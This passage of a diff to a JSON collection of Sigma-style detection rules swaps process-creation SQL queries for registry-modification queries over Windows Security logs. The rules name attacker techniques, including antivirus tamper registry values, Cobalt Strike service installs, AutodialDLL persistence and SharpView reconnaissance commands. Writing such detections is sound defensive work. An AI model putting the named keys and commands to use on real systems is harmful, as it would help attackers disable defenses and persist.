Filter legitimate activity accordingly" + "Unknown" ], - "level": "low", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND CommandLine LIKE '%Stop-Service %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%HKLM\\\\System\\\\CurrentControlSet\\\\Services%' ESCAPE '\\') AND ((NewValue LIKE '%ADMIN$%' ESCAPE '\\' AND NewValue LIKE '%.exe%' ESCAPE '\\') OR (NewValue LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND NewValue LIKE '%start%' ESCAPE '\\' AND NewValue LIKE '%powershell%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_stop_service.yml" + "filename": "registry_set_cobaltstrike_service_installs.yml" }, { - "title": "Kavremover Dropped Binary LOLBIN Usage", - "id": "d047726b-c71c-4048-a99b-2e2f50dc107d", + "title": "Tamper With Sophos AV Registry Keys", + "id": "9f4662ac-17ca-43aa-8f12-5d7b989d0101", "status": "experimental", - "description": "Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.", + "description": "Detects tamper attempts to sophos av functionality via registry key modification", "author": "Nasreddine Bencherchali (Nextron Systems)", - "falsepositives": [ - "Unknown" - ], - "level": "high", "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.t1562.001" ], + "falsepositives": [ + "Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate" + ], + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE 
'% run run-cmd %' ESCAPE '\\' AND NOT ((ParentProcessName LIKE '%\\\\kavremover.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cleanapi.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SAVEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SEDEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos\\\\SAVService\\\\TamperProtection\\\\Enabled%' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_lolbin_kavremover.yml" + "filename": "registry_set_sophos_av_tamper.yml" }, { - "title": "Execute Code with Pester.bat", - "id": "59e938ff-0d6d-4dc3-b13f-36cc28734d4e", + "title": "Disable Administrative Share Creation at Startup", + "id": "c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e", "status": "test", - "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", - "author": "Julia Fomina, oscd.community", + "description": "Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1216" + "attack.t1070.005" ], "falsepositives": [ - "Legitimate use of Pester for writing tests for Powershell scripts and modules" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Pester%' ESCAPE '\\' AND CommandLine LIKE '%Get-Help%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND 
CommandLine LIKE '%pester%' ESCAPE '\\' AND CommandLine LIKE '%;%' ESCAPE '\\' AND (CommandLine LIKE '%help%' ESCAPE '\\' OR CommandLine LIKE '%_%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\LanmanServer\\\\Parameters\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%AutoShareWks' ESCAPE '\\' OR TargetObject LIKE '%AutoShareServer' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_lolbin_pester_1.yml" + "filename": "registry_set_disable_administrative_share.yml" }, { - "title": "PUA - Wsudo Suspicious Execution", - "id": "bdeeabc9-ff2a-4a51-be59-bb253aac7891", + "title": "Outlook Task/Note Reminder Received", + "id": "fc06e655-d98c-412f-ac76-05c2698b1cb2", "status": "experimental", - "description": "Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)", + "description": "Detects changes to the registry values related to outlook that indicates that a reminder was triggered for a Note or Task item. This could be a sign of exploitation of CVE-2023-23397. Further investigation is required to determine the success of an exploitation.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1059" + "attack.persistence", + "attack.t1137" ], "falsepositives": [ - "Unknown" + "Legitimate reminders received for a task or a note will also trigger this rule." 
], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wsudo.exe' ESCAPE '\\' OR OriginalFileName = 'wsudo.exe' OR Description = 'Windows sudo utility' OR ParentProcessName LIKE '%\\\\wsudo-bridge.exe' ESCAPE '\\' OR (CommandLine LIKE '%-u System%' ESCAPE '\\' OR CommandLine LIKE '%-uSystem%' ESCAPE '\\' OR CommandLine LIKE '%-u TrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '%-uTrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '% --ti %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Tasks\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Notes\\\\%' ESCAPE '\\') AND EventType = 'SetValue')" ], - "filename": "proc_creation_win_pua_wsudo_susp_execution.yml" + "filename": "registry_set_exploit_cve_2023_23397_outlook_reminder_trigger.yml" }, { - "title": "HackTool - SharpView Execution", - "id": "b2317cfa-4a47-4ead-b3ff-297438c0bc2d", - "status": "experimental", - "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", - "author": "frack113", + "title": "Internet Explorer Autorun Keys Modification", + "id": "a80f662f-022f-4429-9b8c-b1a41aaa6688", + "status": "test", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.discovery", - "attack.t1049", - "attack.t1069.002", - "attack.t1482", - "attack.t1135", - "attack.t1033" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - 
"Unknown" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'SharpView.exe' OR NewProcessName LIKE '%\\\\SharpView.exe' ESCAPE '\\' OR (CommandLine LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Convert-ADName%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-SID%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR CommandLine LIKE '%Convert-SidToName%' ESCAPE '\\' OR CommandLine LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainProcess%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainShare%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignUser%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-Interesting%' ESCAPE '\\' OR CommandLine LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR CommandLine LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-DFSshare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainController%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDFSShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDNSRecord%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainForeign%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGroup%' ESCAPE '\\' OR CommandLine LIKE 
'%Get-DomainGUIDMap%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainManagedSecurityGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainPolicy%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSID%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestGlobalCatalog%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-GptTmpl%' ESCAPE '\\' OR CommandLine LIKE '%Get-GroupsXML%' ESCAPE '\\' OR CommandLine LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetForest%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGroupMember%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetProcess%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetUser%' ESCAPE '\\' OR CommandLine LIKE '%Get-PathAcl%' ESCAPE '\\' OR CommandLine LIKE '%Get-PrincipalContext%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR CommandLine LIKE 
'%Get-WMIRegCachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegLastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegProxy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharefinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR CommandLine LIKE '%Remove-DomainObjectAcl%' ESCAPE '\\' OR CommandLine LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Request-SPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Set-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Test-AdminAccess%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Internet Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Internet Explorer%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Toolbar%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer Bars%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR ((TargetObject LIKE '%\\\\Extensions\\\\{2670000A-7350-4f3c-8081-5663EE0C6C49}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{789FE86F-6FC4-46A1-9849-EDE0DB0C95CA}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Extensions\\\\{A95fe080-8f5d-11d2-a20b-00aa003c157a}%' ESCAPE '\\')) OR ((TargetObject LIKE '%\\\\Toolbar\\\\ShellBrowser\\\\ITBar7Layout' ESCAPE '\\' OR TargetObject LIKE '%\\\\Toolbar\\\\ShowDiscussionButton' ESCAPE '\\' OR 
TargetObject LIKE '%\\\\Toolbar\\\\Locked' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_hktl_sharpview.yml" + "filename": "registry_set_asep_reg_keys_modification_internet_explorer.yml" }, { - "title": "UEFI Persistence Via Wpbbin - ProcessCreation", - "id": "4abc0ec4-db5a-412f-9632-26659cddf145", + "title": "Potential Persistence Via AutodialDLL", + "id": "e6fe26ee-d063-4f5b-b007-39e90aaf50e3", "status": "experimental", - "description": "Detects execution of the binary \"wpbbin\" which is used as part of the UEFI based persistence method described in the reference section", + "description": "Detects change the the \"AutodialDLL\" key which could be used as a persistence method to load custom DLL via the \"ws2_32\" library", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1542.001" + "attack.persistence" ], "falsepositives": [ - "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\WinSock2\\\\Parameters\\\\AutodialDLL%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wpbbin_potential_persistence.yml" + "filename": "registry_set_persistence_autodial_dll.yml" }, { - "title": "Suspicious Vsls-Agent Command With AgentExtensionPath Load", - "id": "43103702-5886-11ed-9b6a-0242ac120002", + "title": "Disable Windows Defender Functionalities Via Registry Keys", + "id": "0eb46774-f1ab-4a74-8238-1155855f2263", "status": "experimental", - "description": "Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library 
load using the --agentExtensionPath parameter", - "author": "bohops", + "description": "Detects when attackers or tools disable Windows Defender functionalities via the windows registry", + "author": "AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1562.001" ], "falsepositives": [ - "False positives depend on custom use of vsls-agent.exe" + "Administrator actions" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\vsls-agent.exe' ESCAPE '\\' AND CommandLine LIKE '%--agentExtensionPath%' ESCAPE '\\') AND NOT (CommandLine LIKE '%Microsoft.VisualStudio.LiveShare.Agent.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\') AND (((TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableOnAccessProtection' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR TargetObject LIKE '%\\\\Real-Time Protection\\\\DisableScanOnRealtimeEnable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Reporting\\\\DisableEnhancedNotifications' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\DisableBlockAtFirstSeen' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiSpyware' ESCAPE '\\' OR TargetObject LIKE '%\\\\DisableAntiVirus' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)') OR ((TargetObject LIKE '%\\\\SpyNet\\\\SpynetReporting' ESCAPE '\\' OR TargetObject LIKE '%\\\\SpyNet\\\\SubmitSamplesConsent' ESCAPE '\\' OR TargetObject LIKE '%\\\\MpEngine\\\\MpEnablePus' ESCAPE 
'\\') AND NewValue = 'DWORD (0x00000000)')))" ], - "filename": "proc_creation_win_vslsagent_agentextensionpath_load.yml" + "filename": "registry_set_windows_defender_tamper.yml" }, { - "title": "New Root Certificate Installed Via CertMgr.EXE", - "id": "ff992eac-6449-4c60-8c1d-91c9722a1d48", - "status": "test", - "description": "Detects execution of \"certmgr\" with the \"add\" flag in order to install a new certificate on the system.\nAdversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\n", - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "title": "Potential Attachment Manager Settings Associations Tamper", + "id": "a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", + "status": "experimental", + "description": "Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1553.004" + "attack.defense_evasion" ], "falsepositives": [ - "Help Desk or IT may need to manually add a corporate Root CA on occasion. 
Need to test if GPO push doesn't trigger FP" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\CertMgr.exe' ESCAPE '\\' OR OriginalFileName = 'CERTMGT.EXE') AND (CommandLine LIKE '%/add%' ESCAPE '\\' AND CommandLine LIKE '%root%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Associations\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\DefaultFileTypeRisk' ESCAPE '\\' AND NewValue = 'DWORD (0x00006152)') OR (TargetObject LIKE '%\\\\LowRiskFileTypes' ESCAPE '\\' AND (NewValue LIKE '%.zip;%' ESCAPE '\\' OR NewValue LIKE '%.rar;%' ESCAPE '\\' OR NewValue LIKE '%.exe;%' ESCAPE '\\' OR NewValue LIKE '%.bat;%' ESCAPE '\\' OR NewValue LIKE '%.com;%' ESCAPE '\\' OR NewValue LIKE '%.cmd;%' ESCAPE '\\' OR NewValue LIKE '%.reg;%' ESCAPE '\\' OR NewValue LIKE '%.msi;%' ESCAPE '\\' OR NewValue LIKE '%.htm;%' ESCAPE '\\' OR NewValue LIKE '%.html;%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_certmgr_certificate_installation.yml" + "filename": "registry_set_policies_associations_tamper.yml" }, { - "title": "Ie4uinit Lolbin Use From Invalid Path", - "id": "d3bf399f-b0cf-4250-8bb4-dfc192ab81dc", + "title": "Winlogon AllowMultipleTSSessions Enable", + "id": "f7997770-92c3-4ec9-b112-774c4ef96f96", "status": "experimental", - "description": "Detect use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories", - "author": "frack113", + "description": "Detects when the 'AllowMultipleTSSessions' value is enabled.\nWhich allows for multiple Remote Desktop connection sessions to be opened at once.\nThis is often used by attacker as a way to connect to an RDP 
session without disconnecting the other users\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1218" + "attack.t1112" ], "falsepositives": [ - "ViberPC updater calls this binary with the following commandline \"ie4uinit.exe -ClearIconCache\"" + "Legitimate use of the multi session functionality" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ie4uinit.exe' ESCAPE '\\' OR OriginalFileName = 'IE4UINIT.EXE') AND NOT (((CurrentDirectory LIKE 'c:\\\\windows\\\\system32\\\\' ESCAPE '\\' OR CurrentDirectory LIKE 'c:\\\\windows\\\\sysWOW64\\\\' ESCAPE '\\')) OR (CurrentDirectory = '')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\AllowMultipleTSSessions' ESCAPE '\\' AND NewValue LIKE '%DWORD (0x00000001)' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_ie4uinit.yml" + "filename": "registry_set_winlogon_allow_multiple_tssessions.yml" }, { - "title": "Use of Pcalua For Execution", - "id": "0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2", + "title": "Custom File Open Handler Executes PowerShell", + "id": "7530b96f-ad8e-431d-a04d-ac85cc461fdc", "status": "experimental", - "description": "Detects execition of commands and binaries from the context of The program compatibility assistant (Pcalua.exe). This can be used as a LOLBIN in order to bypass application whitelisting.", - "author": "Nasreddine Bencherchali (Nextron Systems), E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "description": "Detects the abuse of custom file open handler, executing powershell", + "author": "CD_R0M_", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Legitimate use by a via a batch script or by an administrator." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\pcalua.exe' ESCAPE '\\' AND CommandLine LIKE '% -a%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%shell\\\\open\\\\command\\\\%' ESCAPE '\\' AND NewValue LIKE '%powershell%' ESCAPE '\\' AND NewValue LIKE '%-command%' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "proc_creation_win_lolbin_pcalua.yml" + "filename": "registry_set_custom_file_open_handler_powershell_execution.yml" }, { - "title": "Suspicious PowerShell Command Line", - "id": "d7bcd677-645d-4691-a8d4-7a5602b780d1", + "title": "Wow6432Node Classes Autorun Keys Modification", + "id": "18f2065c-d36c-464a-a748-bcf909acb2e3", "status": "test", - "description": "Detects the PowerShell command lines with special characters", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unlikely", - "Amazon SSM Document Worker", - "Windows Defender ATP" + "Legitimate software automatically (mostly, during 
installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*') OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*') OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*') OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\^.*\\^.*\\^.*\\^.*\\^.*') OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*`.*`.*`.*`.*`.*')) AND NOT (ParentProcessName LIKE 'C:\\\\Program Files\\\\Amazon\\\\SSM\\\\ssm-document-worker.exe' ESCAPE '\\')) AND NOT (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*' AND (CommandLine LIKE '%new EventSource(\"Microsoft.Windows.Sense.Client.Management\"%' ESCAPE '\\' OR CommandLine LIKE '%public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Classes%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ExtShellFolderViews%' ESCAPE '\\' OR TargetObject 
LIKE '%\\\\Folder\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ColumnHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\CopyHookHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AllFileSystemObjects\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\PropertySheetHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\ContextMenuHandlers%' ESCAPE '\\')) AND NOT (NewValue = '(Empty)'))" ], - "filename": "proc_creation_win_powershell_cmdline_special_characters.yml" + "filename": 